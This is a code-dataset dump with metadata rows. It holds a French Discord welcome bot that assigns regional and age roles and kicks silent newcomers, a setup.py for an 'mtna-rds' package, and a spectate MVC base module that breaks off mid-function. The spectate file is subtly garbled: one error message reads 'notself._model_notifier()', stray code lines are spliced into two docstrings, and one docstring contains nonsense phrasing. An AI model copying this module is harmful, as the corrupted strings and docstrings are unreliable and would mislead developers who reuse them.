hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b3d0c3d583358469a62183dc3e94d74f4fb738b4 | 19,768 | py | Python | botintegration/main.py | discord-autonomie/PreciousPlasticBot | d0934823d9ef4e9ea268047d100756ba95b0731f | [
"MIT"
] | null | null | null | botintegration/main.py | discord-autonomie/PreciousPlasticBot | d0934823d9ef4e9ea268047d100756ba95b0731f | [
"MIT"
] | null | null | null | botintegration/main.py | discord-autonomie/PreciousPlasticBot | d0934823d9ef4e9ea268047d100756ba95b0731f | [
"MIT"
] | 2 | 2019-09-21T13:36:19.000Z | 2019-10-25T16:28:54.000Z | import asyncio
import discord
import os
import json
import time
from datetime import datetime
from config import get_configuration
departements = json.loads(open("departements.json").read())
regions = json.loads(open("regions.json").read())
async def log(self, guild, message) :
config = get_configuration(guild.id)
with open("logs.txt", "a") as f :
f.write(time.strftime('[%d/%m/%Y %H:%M:%S] ', time.localtime())+guild.name+" : "+message+"\n")
if config["LOG_CHANNEL"] :
channel = discord.utils.find(lambda c: c.name == config["LOG_CHANNEL"], guild.channels)
if channel :
if guild.me.permissions_in(channel).send_messages :
await channel.send(embed=discord.Embed(description=message, color=0x50bdfe))
else :
await contact_modos(self, guild, "Erreur: je n'ai pas la permission d'écrire dans "+channel.mention)
else :
await contact_modos(self, guild, "Erreur: le salon **#"+config["LOG_CHANNEL"]+"** n'existe pas.")
async def contact_modos(self, guild, message):
config = get_configuration(guild.id)
admin = self.get_user(config["ADMIN_ID"])
modo_channel = discord.utils.find(lambda c: c.name == config["MODO_CHANNEL"], guild.channels)
modo_role = discord.utils.find(lambda r: r.name == config["MODO_ROLE"], guild.roles)
if not modo_channel :
await admin.send("\N{WARNING SIGN} Le salon '"+config["MODO_CHANNEL"]+"' n'existe pas, je ne peux plus contacter les modérateurs alors je m'adresse à toi.")
elif not guild.me.permissions_in(modo_channel).send_messages :
modo_channel = None
await admin.send("\N{WARNING SIGN} Je n'ai plus le droit d'écrire dans #"+config["MODO_CHANNEL"]+" du serveur "+guild.name+" donc je ne peux plus contacter les modérateurs donc je m'adresse à toi.")
if modo_channel :
if modo_role :
await modo_channel.send(modo_role.mention+", "+message)
else:
await modo_channel.send("Erreur : je ne peux pas mentionner les modérateurs car le rôle @"+config["MODO_ROLE"]+" a disparu.")
await modo_channel.send(message)
else :
await admin.send(message)
async def refresh_geoloc_list(self, guild):
config = get_configuration(guild.id)
display_channel = discord.utils.find(lambda m: m.name == config["GEOLOC_DISPLAY_CHANNEL"], guild.channels)
if display_channel == None :
await contact_modos(self, guild, "Erreur: je ne peux pas afficher la liste dans *"+config["GEOLOC_DISPLAY_CHANNEL"]+"* car le salon n'existe pas.")
return
elif not guild.me.permissions_in(display_channel).send_messages :
await contact_modos(self, guild, "Erreur: je ne peux pas afficher la liste dans "+display_channel.mention+" car je n'ai pas les permission d'y écrire.")
return
async for message in display_channel.history(limit=len(departements) + 30, oldest_first=True):
if message.author.id != self.user.id :
await message.delete()
continue
if message.content == "": # embed
try :
departement_code = message.embeds[0].title.split(" ")[0]
except AttributeError:
await message.delete()
continue
role = discord.utils.find(lambda r: r.name.startswith(departement_code+" -"), guild.roles)
if not role :
await contact_modos(self, guild, "le rôle **"+departement_code+" - "+departements[departement_code]["name"]+"** n'existe plus !!")
return
if len(role.members) == 0 :
txt = "Personne \N{DISAPPOINTED BUT RELIEVED FACE}"
else :
txt = " | ".join(sorted([str(user) for user in role.members]))
if len(txt) > 2048 :
txt = txt[:2042]+" [...]"
if txt != message.embeds[0].description:
await log(self, guild, "Je modifie la liste **"+departement_code+" - "+departements[departement_code]["name"]+"**")
embed = discord.Embed(title=departement_code+" - "+departements[departement_code]["name"], description=txt, color=0x50bdfe)
await message.edit(embed=embed)
async def set_user_region(self, member, first_time=False, rappel=0, just_wait=False):
if just_wait:
await log(self, member.guild, "J'attends une réponse de "+member.mention)
else :
if rappel == 0 :
await log(self, member.guild, "Je demande à "+member.mention+" sa région")
else :
await log(self, member.guild, "Je redemande à "+member.mention+" sa région, rappel n°"+str(rappel))
config = get_configuration(member.guild.id)
admin = self.get_user(config["ADMIN_ID"]) # Titou : 499530093539098624
try :
if not just_wait :
if first_time :
await member.send("Salut et bienvenue sur le serveur **"+member.guild.name+"** ! Je suis le robot chargé de l'accueil des nouveaux. Pour pouvoir accéder au serveur tu vas devoir me dire où tu habites et si tu es mineur ou majeur.")
await member.send("Envoie moi le numéro de ton département (99 si tu es étranger) :")
def check(m):
return m.channel.type == discord.ChannelType.private and m.author == member
def checkR(reaction, user):
return user == member and str(reaction.emoji) in reacts
rep = await client.wait_for('message', check=check, timeout=60*60*24)
code = rep.content.upper()
if len(code) == 1 : code = "0"+code
while code not in departements and code != "99" :
await member.send("Je ne connais pas ce numéro. Envoie `99` si tu es étranger sinon voici les numéros de départements français : "+", ".join(sorted(departements.keys())))
rep = await client.wait_for('message', check=check, timeout=60*60*24)
code = rep.content.upper()
if len(code) == 1 : code = "0"+code
if code == "99" :
await member.send("Envoie moi l'émoji correspondant à ton pays :")
try:
rep = await client.wait_for('message', check=check, timeout=60*60*24)
while not rep.content.encode()[0] == 0xf0 or len(rep.content) != 2:
await contact_modos(self, member.guild, member.mention+" a l'air de galérer avec avec l'ajout de rôle, vous pouvez peut-être voir pour l'aider si dans quelques minutes il n'a toujours pas de rôle")
await member.send("Envoie juste l'émoji, clique sur la petite tête à droite et cherche ton drapeau dans la liste (tu peux taper `flag` dans la barre de recherche).")
rep = await client.wait_for('message', check=check, timeout=60*60*24)
except asyncio.TimeoutError:
await contact_modos(self, member.guild, member.mention+" a l'air de galérer avec avec l'ajout de rôle, vous pouvez peut-être voir pour l'aider si dans quelques minutes il n'a toujours pas de rôle")
await member.send("Bon OK je te propose de repartir de zéro. Si vraiment tu galères tu peux contacter "+admin.mention+" qui est l'administrateur.")
await set_user_region(self, member)
return
if rep.content.encode() == b'\xf0\x9f\x87\xab\xf0\x9f\x87\xb7':
await member.send("Si tu es français, il faut m'envoyer le numéro de ton département.")
await set_user_region(self, member)
return
role = discord.utils.find(lambda r: r.name.split(" ")[0]==rep.content, member.guild.roles)
if role == None :
await contact_modos(self, member.guild, "L'utilisateur "+member.mention+" me dit qu'il est étranger mais je ne connais pas son drapeau ("+rep.content+"), je vous laisse voir avec lui et créer le rôle.")
await member.send("Je ne connais pas ce drapeau. J'ai contacté l'équipe de modérateurs ils devraient prendre contact avec toi d'ici 24h.")
return
else :
msg = await member.send("Je vais t'ajouter ce rôle : "+role.name+"\nC'est bien ça ?")
reacts = ["\N{WHITE HEAVY CHECK MARK}", "\N{CROSS MARK}"]
for r in reacts :
await msg.add_reaction(r)
try:
reaction, user = await client.wait_for('reaction_add', timeout=60, check=checkR)
except asyncio.TimeoutError:
await contact_modos(self, member.guild, member.mention+" a l'air de galérer avec avec l'ajout de rôle, vous pouvez peut-être voir pour l'aider si dans quelques minutes il n'a toujours pas de rôle")
await member.send("Bon OK je te propose de repartir de zéro. Si vraiment tu galères tu peux contacter "+admin.mention+" qui est l'administrateur.")
await set_user_region(self, member)
return
if str(reaction.emoji) == "\N{CROSS MARK}" :
await contact_modos(self, member.guild, member.mention+" a l'air de galérer avec avec l'ajout de rôle, vous pouvez peut-être voir pour l'aider si dans quelques minutes il n'a toujours pas de rôle")
await member.send("Bon OK je on recommence.")
await set_user_region(self, member)
return
await member.add_roles(role)
await log(self, member.guild, "J'ajoute le rôle "+role.mention+" à "+member.mention)
else :
departement = departements[code]
region = regions[departement["region_code"]]
txt = "Je vais t'ajouter les rôles suivants :\nDépartement : **"+departement["name"]+"**\nRégion : **"+region["name"]+"**\nUtilise les réactions pour me dire si tu es d'accord."
msg = await member.send(txt)
reacts = ["\N{WHITE HEAVY CHECK MARK}", "\N{CROSS MARK}"]
for r in reacts :
await msg.add_reaction(r)
try:
reaction, user = await client.wait_for('reaction_add', timeout=60, check=checkR)
except asyncio.TimeoutError:
await contact_modos(self, member.guild, member.mention+" a l'air de galérer avec avec l'ajout de rôle, vous pouvez peut-être voir pour l'aider si dans quelques minutes il n'a toujours pas de rôle")
await member.send("Bon OK je te propose de repartir de zéro. Si vraiment tu galères tu peux contacter "+admin.mention+" qui est l'administrateur.")
await set_user_region(self, member)
return
if str(reaction.emoji) == "\N{CROSS MARK}" :
await contact_modos(self, member.guild, member.mention+" a l'air de galérer avec avec l'ajout de rôle, vous pouvez peut-être voir pour l'aider si dans quelques minutes il n'a toujours pas de rôle")
await member.send("Bon OK je on recommence.")
await set_user_region(self, member)
return
async with member.typing():
for role in member.roles :
if role.color.to_rgb() == config["REGION_ROLE_COLOR"] :
await member.remove_roles(role)
await log(self, member.guild, "J'enlève le rôle "+role.mention+" à "+member.mention)
if role.color.to_rgb() == config["DEPARTEMENT_ROLE_COLOR"]:
await member.remove_roles(role)
await log(self, member.guild, "J'enlève le rôle "+role.mention+" à "+member.mention)
await refresh_geoloc_list(self, member.guild)
role = discord.utils.find(lambda r: r.name.startswith(code+" -"), member.guild.roles)
if role == None :
await contact_modos(self, member.guild, "Erreur, je n'ai pas pu ajouter le rôle **"+code+" - "+departement["name"]+"** à "+member.mention+" car le rôle ne semble pas exister.")
return
await member.add_roles(role)
await log(self, member.guild, "J'ajoute le rôle "+role.mention+" à "+member.mention)
await refresh_geoloc_list(self, member.guild)
role = discord.utils.get(member.guild.roles, name=region["name"])
if role == None:
await contact_modos(self, member.guild, "Erreur, je n'ai pas pu ajouter le rôle *"+region["name"]+"* à "+member.mention+" car le rôle ne semble pas exister.")
return
await member.add_roles(role)
await log(self, member.guild, "J'ajoute le rôle "+role.mention+" à "+member.mention)
if config["REMOVE_NEWUSER_ROLE"] :
role = discord.utils.get(member.guild.roles, name=config["NEWUSER_ROLE_NAME"])
if role == None :
await contact_modos(self, member.guild, "Erreur: le rôle "+config["NEWUSER_ROLE_NAME"]+" n'existe plus ou a changé de nom")
return
if role in member.roles :
await member.remove_roles(role)
await log(self, member.guild, "J'enlève le rôle "+role.mention+" à "+member.mention)
await member.send("OK maintenant écris moi `mineur` si tu as moins de 18 ans et `majeur` si tu as 18 ans ou plus :")
rep = await client.wait_for('message', check=check, timeout=60*60*24)
while rep.content.lower() != "mineur" and rep.content.lower() != "majeur" :
await member.send("Je n'ai pas compris tu peux juste écrire `mineur` ou `majeur` stp.")
rep = await client.wait_for('message', check=check, timeout=60*60*24)
role = discord.utils.get(member.guild.roles, name=config["YOUNG_ROLE_NAME"])
if role == None :
await contact_modos(self, member.guild, "Erreur, je n'ai pas pu ajouter le rôle *"+config["YOUNG_ROLE_NAME"]+"* à "+member.mention+" car le rôle ne semble pas exister.")
return
if rep.content.lower() == "mineur" :
await member.add_roles(role)
await log(self, member.guild, "J'ajoute le rôle "+role.mention+" à "+member.mention)
elif role in member.roles :
await member.remove_roles(role)
await log(self, member.guild, "J'enlève le rôle "+role.mention+" à "+member.mention)
confirmedRole = discord.utils.get(member.guild.roles, name=config["CONFIRMED_ROLE_NAME"])
if not confirmedRole :
await contact_modos(self, member.guild, "Erreur: le rôle "+config["CONFIRMED_ROLE_NAME"]+" n'existe plus donc je ne peux plus le donner...")
return
else :
if not confirmedRole in member.roles :
await member.add_roles(confirmedRole)
await log(self, member.guild, "J'ajoute le rôle "+confirmedRole.mention+" à "+member.mention)
if config["WELCOME_ANOUNCE"] :
chan = discord.utils.get(member.guild.channels, name=config["WELCOME_CHANNEL"])
if chan :
await chan.send("Bienvenue à "+member.mention)
else :
await contact_modos(self, member.guild, "Erreur: le salon **"+config["WELCOME_CHANNEL"]+"** n'existe pas pour dire bienvenue.")
return
await member.send("C'est tout bon, tu peux accéder au serveur !")
except asyncio.TimeoutError :
if config["NEWUSER_ROLE_NAME"] in [r.name for r in member.roles] :
if rappel == 0 :
await member.send("Désolé de te déranger mais ça fait 24h que tu ne m'as pas répondu. Il faut obligatoirement répondre à ces questions pour accéder au serveur. Ceci est le premier rappel. **Si je n'ai pas de réponse dans 48h tu seras exclu du serveur.**")
await set_user_region(self, member, rappel=1)
if rappel == 1 :
await member.send("Désolé de te déranger à nouveau mais ça fait 24h que tu ne m'as pas répondu. Il faut obligatoirement répondre à ces questions pour accéder au serveur. Ceci est le deuxième rappel. **Si je n'ai pas de réponse dans 24h tu seras exclu de ce serveur.**")
await set_user_region(self, member, rappel=2)
if rappel == 2 :
await member.send("Cela fait 72h que tu as rejoint le serveur et tu n'as toujours pas répondu aux questions. Je vais donc t'exclure. Tu pourras néanmoins rejoindre le serveur à nouveau avec un lien d'invitation.")
await member.kick(reason="Pas de réponses aux questions d'accueil durant 72h.")
await log(self, member.guild, "J'ai exclu "+member.mention+" après 72h sans réponse.")
except discord.Forbidden :
await contact_modos(self, member.guild, "Je n'ai pas la permission de contacter "+member.mention+" par MP, merci de gérer ses rôles manuellement.")
class MyClient(discord.Client):
async def on_ready(self):
for guild in self.guilds:
await log(self, guild, "Je viens de redémarrer.")
config = get_configuration(guild.id)
if config["RUN_SYNC_ON_STARTUP"]:
for member in guild.members :
if config["NEWUSER_ROLE_NAME"] in [role.name for role in member.roles] :
h = (datetime.now() - member.joined_at).total_seconds()/60/60
if h >= 72 :
await member.kick(reason="Pas de signes de vie depuis "+str(int(h/24))+" jours")
await log(self, member.guild, "J'expulse "+member.mention)
else:
asyncio.ensure_future(set_user_region(self, member, rappel=int(h/24), just_wait=True))
await refresh_geoloc_list(self, guild)
async def on_message(self, message):
config = None
if message.guild:
config = get_configuration(message.guild.id)
if config:
geoloc_command = config["GEOLOC_COMMAND_NAME"]
if message.content.startswith(geoloc_command):
await set_user_region(self, message.author)
if config["REMOVE_GEOLOCS_MESSAGES"]:
await message.delete()
async def on_member_join(self, member):
config = get_configuration(member.guild.id)
if config["ADD_NEWUSER_ROLE"] :
role = discord.utils.get(member.guild.roles, name=config["NEWUSER_ROLE_NAME"])
if role :
if not role in member.roles :
await member.add_roles(role)
else :
await contact_modos(self, member.guild, "Ereur: le rôle "+config["NEWUSER_ROLE_NAME"]+" n'existe plus ou a changé de nom.")
await set_user_region(self, member, first_time=True)
async def on_member_remove(member):
config = get_configuration(member.guild.id)
if config["GOODBYE_ANOUNCE"] :
chan = discord.utils.get(member.guild.channels, name=config["GOODBYE_CHANNEL"])
if chan :
await chan.send("Au revoir "+member.mention)
else :
await contact_modos(self, member.guild, "Erreur: le salon **"+config["GOODBYE_CHANNEL"]+"** n'existe pas pour dire au revoir.")
intents = discord.Intents.default()
intents.members = True
client = MyClient(intents=intents)
if "DISCORD_TOKEN" in os.environ:
client.run(os.environ["DISCORD_TOKEN"])
else:
print("Missing DISCORD_TOKEN environment variable")
| 53.86376 | 285 | 0.610633 | 2,616 | 19,768 | 4.539373 | 0.15711 | 0.041684 | 0.040421 | 0.037137 | 0.598232 | 0.551158 | 0.484632 | 0.450274 | 0.420042 | 0.381389 | 0 | 0.009937 | 0.282173 | 19,768 | 366 | 286 | 54.010929 | 0.82685 | 0.001669 | 0 | 0.423077 | 0 | 0.052448 | 0.29404 | 0.006132 | 0 | 0 | 0.001014 | 0 | 0 | 1 | 0.006993 | false | 0 | 0.024476 | 0.006993 | 0.097902 | 0.003497 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b3d1fe94baad9d15458d5ff9000e994472945459 | 1,062 | py | Python | setup.py | mtna/rds-python | 961ea12fc70a35c8b979855c8f20a803a9d2f596 | [
"Apache-2.0"
] | 3 | 2020-05-15T17:31:18.000Z | 2021-05-05T09:21:24.000Z | setup.py | mtna/rds-python | 961ea12fc70a35c8b979855c8f20a803a9d2f596 | [
"Apache-2.0"
] | null | null | null | setup.py | mtna/rds-python | 961ea12fc70a35c8b979855c8f20a803a9d2f596 | [
"Apache-2.0"
] | 2 | 2020-06-04T09:01:35.000Z | 2021-04-22T14:49:36.000Z | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="mtna-rds",
version="0.2.16",
author="Metadata Technology North America Inc.",
author_email="mtna@mtna.us",
description="A library to query the Rich Data Services API framework developed by MTNA",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/mtna/rds-python/",
packages=setuptools.find_packages(),
classifiers=[
"Topic :: Database :: Database Engines/Servers",
"Natural Language :: English",
"Development Status :: 3 - Alpha",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
],
python_requires='>=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, !=3.5.*, <4'
)
| 36.62069 | 92 | 0.620527 | 128 | 1,062 | 5.078125 | 0.625 | 0.092308 | 0.153846 | 0.12 | 0.083077 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033493 | 0.212806 | 1,062 | 28 | 93 | 37.928571 | 0.744019 | 0 | 0 | 0 | 0 | 0.038462 | 0.55838 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.038462 | 0 | 0.038462 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b3d58035864fec3162d63e3f38f884692d40a888 | 13,575 | py | Python | spectate/mvc/base.py | agoose77/spectate | a70d8e3fb8e9e3f053cb2a1c5a4c760df0d61cb3 | [
"MIT"
] | null | null | null | spectate/mvc/base.py | agoose77/spectate | a70d8e3fb8e9e3f053cb2a1c5a4c760df0d61cb3 | [
"MIT"
] | null | null | null | spectate/mvc/base.py | agoose77/spectate | a70d8e3fb8e9e3f053cb2a1c5a4c760df0d61cb3 | [
"MIT"
] | null | null | null | # See End Of File For Licensing
from inspect import signature
from functools import wraps
from typing import Union, Callable, Optional
from contextlib import contextmanager
from weakref import WeakValueDictionary
from spectate.core import Watchable, watched, Immutable, MethodSpectator
from .utils import members
__all__ = ["Model", "Control", "view", "unview", "views", "link", "unlink", "notifier"]
def views(model: "Model") -> list:
"""Return a model's views keyed on what events they respond to.
Model views are added by calling :func:`view` on a model.
"""
if not isinstance(model, Model):
raise TypeError("Expected a Model, not %r." % model)
return model._model_views[:]
def view(model: "Model", *functions: Callable) -> Optional[Callable]:
"""A decorator for registering a callback to a model
Parameters:
model: the model object whose changes the callback should respond to.
Examples:
.. code-block:: python
from spectate import mvc
items = mvc.List()
@mvc.view(items)
def printer(items, events):
for e in events:
print(e)
items.append(1)
"""
if not isinstance(model, Model):
raise TypeError("Expected a Model, notself._model_notifier() %r." % model)
def setup(function: Callable):
model._attach_model_view(function)
return function
if functions:
for f in functions:
setup(f)
else:
return setup
def unview(model: "Model", function: Callable):
"""Remove a view callbcak from a model.
target._notify_model_views(tuple(function(value, events)))
Parameters:
model: The model which contains the view function.
function: The callable which was registered to the model as a view.
Raises:
ValueError: If the given ``function`` is not a view of the given ``model``.
"""
model._remove_model_view(function)
def link(source, *targets):
"""Attach all of the source's present and future view functions to the targets.
Parameters:
source: The model whose view functions will be attached to the targets.
targets: The models that will acquire the source's view functions.
"""
for t in targets:
source._attach_child_model(t)
def unlink(source, *targets):
"""Remove all of the source's present and future view functions from the targets.
Parameters:
source: The model whose view functions will be removed from the targets.
targets: The models that will no longer share view functions with the source.
"""
for t in targets:
source._remove_child_model(t)
@contextmanager
def notifier(model):
"""Manually send notifications to the given model.
Parameters:
model: The model whose views will recieve notifications
Returns:
A function whose keyword arguments become event data.
Example:
.. code-block:: python
m = Model()
@view(m)
def printer(m, events):
for e in events:
print(e)
with notifier(m) as notify:
# the view should print out this event
notify(x=1, y=2)
"""
events = []
def notify(*args, **kwargs):
events.append(Immutable(*args, **kwargs))
yield notify
if events:
model._notify_model_views(events)
class Control:
"""An object used to define control methods on a :class:`Model`
A "control" method on a :class:`Model` is one which reacts to another method being
called. For example there is a control method on the
:class:`~spectate.mvc.models.List`
which responds when :meth:`~spectate.mvc.models.List.append` is called.
target._notify_model_views(tuple(function(value, events)))
A control method is a slightly modified :ref:`beforeback <Spectator Beforebacks>` or
:ref:`afterback <Spectator Afterbacks>` that accepts an extra ``notify`` argument.
These are added to a control object by calling :meth:`Control.before` or
:meth:`Control.after` respectively. The ``notify`` arugment is a function which
allows a control method to send messages to :func:`views <view>` that are registered
to a :class:`Model`.
Parameters:
methods:
The names of the methods on the model which this control will react to
When they are calthrough the Nodeled. This is either a comma seperated
string, or a list of strings.
before:
A control method that reacts before any of the given ``methods`` are
called. If given as a callable, then that function will be used as the
callback. If given as a string, then the control will look up a method
with that name when reacting (useful when subclassing).
after:
A control method that reacts after any of the given ``methods`` are
alled. If given as a callable, then that function will be used as the
callback. If given as a string, then the control will look up a method
with that name when reacting (useful when subclassing).
Examples:
Control methods are registered to a :class:`Control` with a ``str`` or function.
A string may refer to the name of a method on a `Model` while a function should
be decorated under the same name as the :class:`Control` object to preserve the
namespace.
.. code-block:: python
from spectate import mvc
class X(mvc.Model):
_control_method = mvc.Control("method").before("_control_before_method")
def _control_before_method(self, call, notify):
print("before")
# Note how the method uses the same name. It
# would be redundant to use a different one.
@_control_a.after
def _control_method(self, answer, notify):
print("after")
def method(self):
print("during")
x = X()
x.method()
.. code-block:: text
before
during
after
"""
def __init__(
self,
methods: Union[list, tuple, str],
*,
before: Union[Callable, str] = None,
after: Union[Callable, str] = None,
):
if isinstance(methods, (list, tuple)):
self.methods = tuple(methods)
elif isinstance(methods, str):
self.methods = tuple(map(str.strip, methods.split(",")))
else:
raise ValueError("methods must be a string of list of strings")
self.name = None
if isinstance(before, Control):
before = before._before
self._before = before
if isinstance(after, Control):
after = after._after
self._after = after
def __get__(self, obj, cls):
if obj is None:
return self
else:
return BoundControl(obj, self)
def __set_name__(self, cls, name):
if not issubclass(cls, Model):
raise TypeError("Can only define a control on a Model, not %r" % cls)
if self.name:
msg = "Control was defined twice - %r and %r."
raise RuntimeError(msg % (self.name, name))
else:
self.name = name
for m in self.methods:
setattr(cls, m, MethodSpectator(getattr(cls, m), m))
class BoundControl:
def __init__(self, obj, ctrl):
self._obj = obj
self._cls = type(obj)
self._name = ctrl.name
self._before = ctrl._before
self._after = ctrl._after
self.methods = ctrl.methods
@property
def before(self):
if self._before is None:
method_name = self._name + "_before"
if hasattr(self._obj, method_name):
before = getattr(self._obj, method_name)
else:
return None
else:
before = self._before
if isinstance(before, str):
before = getattr(self._obj, before)
elif hasattr(before, "__get__"):
before = before.__get__(self._obj, type(self._obj))
@wraps(before)
def beforeback(value, call):
def parameters():
meth = getattr(value, call.name)
bound = signature(meth).bind(*call.args, **call.kwargs)
return dict(bound.arguments)
with notifier(value) as notify:
return before(call + {"parameters": parameters}, notify)
return beforeback
@property
def after(self):
if self._after is None:
return None
else:
after = self._after
if isinstance(after, str):
after = getattr(self._obj, after)
elif hasattr(after, "__get__"):
after = after.__get__(self._obj, type(self._obj))
@wraps(after)
def afterback(value, answer):
with notifier(value) as notify:
return after(answer, notify)
return afterback
class Model(Watchable):
"""An object that can be :class:`controlled <Control>` and :func:`viewed <view>`.
Users should define :class:`Control` methods and then :func:`view` the change
events those controls emit. This process starts by defining controls on a subclass
of :class:`Model`.
Examples:
.. code-block:: python
from specate import mvc
class Object(Model):
_control_attr_change = Control(
"__setattr__, __delattr__",
before="_control_before_attr_change",
after="_control_after_attr_change",
)
def __init__(self, *args, **kwargs):
for k, v in dict(*args, **kwargs).items():
setattr(self, k, v)
def _control_before_attr_change(self, call, notify):
return call.args[0], getattr(self, call.args[0], Undefined)
def _control_after_attr_change(self, answer, notify):
attr, old = answer.before
new = getattr(self, attr, Undefined)
if new != old:
notify(attr=attr, old=old, new=new)
o = Object()
@mvc.view(o)
def printer(o, events):
for e in events:
print(e)
o.a = 1
o.b = 2
.. code-block:: text
{'attr': 'a', 'old': Undefined, 'new': 1}
{'attr': 'b', 'old': Undefined, 'new': 2}
"""
_model_controls = ()
def __init_subclass__(cls, **kwargs):
controls = []
for k, v in members(cls):
if isinstance(v, Control):
controls.append(k)
cls._model_controls = tuple(controls)
super().__init_subclass__(**kwargs)
def __new__(cls, *args, **kwargs):
self, spectator = watched(super().__new__, cls)
for name in cls._model_controls:
ctrl = getattr(self, name)
for method in ctrl.methods:
spectator.callback(method, ctrl.before, ctrl.after)
object.__setattr__(self, "_model_views", [])
object.__setattr__(self, "_inner_models", WeakValueDictionary())
return self
def _attach_child_model(self, model):
self._inner_models[id(model)] = model
for v in self._model_views:
model._attach_model_view(v)
def _remove_child_model(self, model):
try:
del self._inner_models[id(model)]
except KeyError:
pass
else:
for v in self._model_views:
